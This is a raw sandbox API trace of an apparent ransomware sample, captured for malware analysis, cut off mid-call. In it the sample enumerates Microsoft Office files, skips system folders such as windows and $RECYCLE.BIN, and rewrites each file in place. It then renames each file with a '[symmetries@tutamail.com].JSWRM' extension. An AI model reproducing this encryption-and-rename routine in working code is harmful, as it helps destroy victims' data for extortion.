RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0122.642] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0122.654] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.654] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0122.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.655] CloseHandle (hObject=0x238) returned 1 [0122.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0122.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0122.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0122.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0122.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0122.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0122.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.655] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0122.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0122.657] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x295, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_STD_COL.HXC", cAlternateFileName="WINPRO~1.HXC")) returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2=".") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="..") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="...") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="windows") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="recovery") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="perflogs") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="documents and settings") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="system volume information") returned 1 [0122.657] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXC", lpString2="msocache") returned 1 [0122.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXC", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0122.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXC", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_COL.HXC", lpUsedDefaultChar=0x0) returned 19 [0122.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXC", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0122.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXC", cchWideChar=19, lpMultiByteStr=0x2412e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_COL.HXC", lpUsedDefaultChar=0x0) returned 19 [0122.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0122.657] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0122.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0122.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.658] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=661) returned 1 [0122.658] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.658] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x290) returned 0x20b1f8 [0122.658] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x290, lpOverlapped=0x0) returned 1 [0122.659] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.660] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x290, lpOverlapped=0x0) returned 1 [0122.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.660] CloseHandle (hObject=0x238) returned 1 [0122.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0122.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0122.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0122.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0122.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0122.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0122.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0122.660] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0122.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0122.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0122.661] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0122.661] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_STD_COL.HXT", cAlternateFileName="WINPRO~2.HXT")) returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2=".") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="..") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="...") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="windows") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="recovery") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="perflogs") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="documents and settings") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="system volume information") returned 1 [0122.661] lstrcmpiW (lpString1="WINPROJ_STD_COL.HXT", lpString2="msocache") returned 1 [0122.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0122.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXT", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_COL.HXT", lpUsedDefaultChar=0x0) returned 19 [0122.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0122.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_COL.HXT", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_COL.HXT", lpUsedDefaultChar=0x0) returned 19 [0122.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0122.662] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0122.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.662] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0122.662] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.672] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=211) returned 1 [0122.672] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.672] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0122.672] ReadFile (in: hFile=0x238, lpBuffer=0x22ea18, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesRead=0x345e89c*=0xd0, lpOverlapped=0x0) returned 1 [0122.673] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.673] WriteFile (in: hFile=0x238, lpBuffer=0x22ea18*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22ea18*, lpNumberOfBytesWritten=0x345e898*=0xd0, lpOverlapped=0x0) returned 1 [0122.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0122.673] CloseHandle (hObject=0x238) returned 1 [0122.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0122.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0122.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0122.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0122.674] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0122.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0122.674] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.674] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0122.675] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b93a5c4, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b93a5c4, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="WINPROJ_STD_F_COL.HXK", cAlternateFileName="WINPRO~2.HXK")) returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2=".") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="..") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="...") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="windows") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="recovery") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="perflogs") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="documents and settings") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="system volume information") returned 1 [0122.675] lstrcmpiW (lpString1="WINPROJ_STD_F_COL.HXK", lpString2="msocache") returned 1 [0122.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x241268, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_F_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0122.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WINPROJ_STD_F_COL.HXK", cchWideChar=21, lpMultiByteStr=0x241308, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WINPROJ_STD_F_COL.HXK", lpUsedDefaultChar=0x0) returned 21 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0122.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0122.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.676] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0122.676] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0122.676] ReadFile (in: hFile=0x238, lpBuffer=0x209878, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209878*, 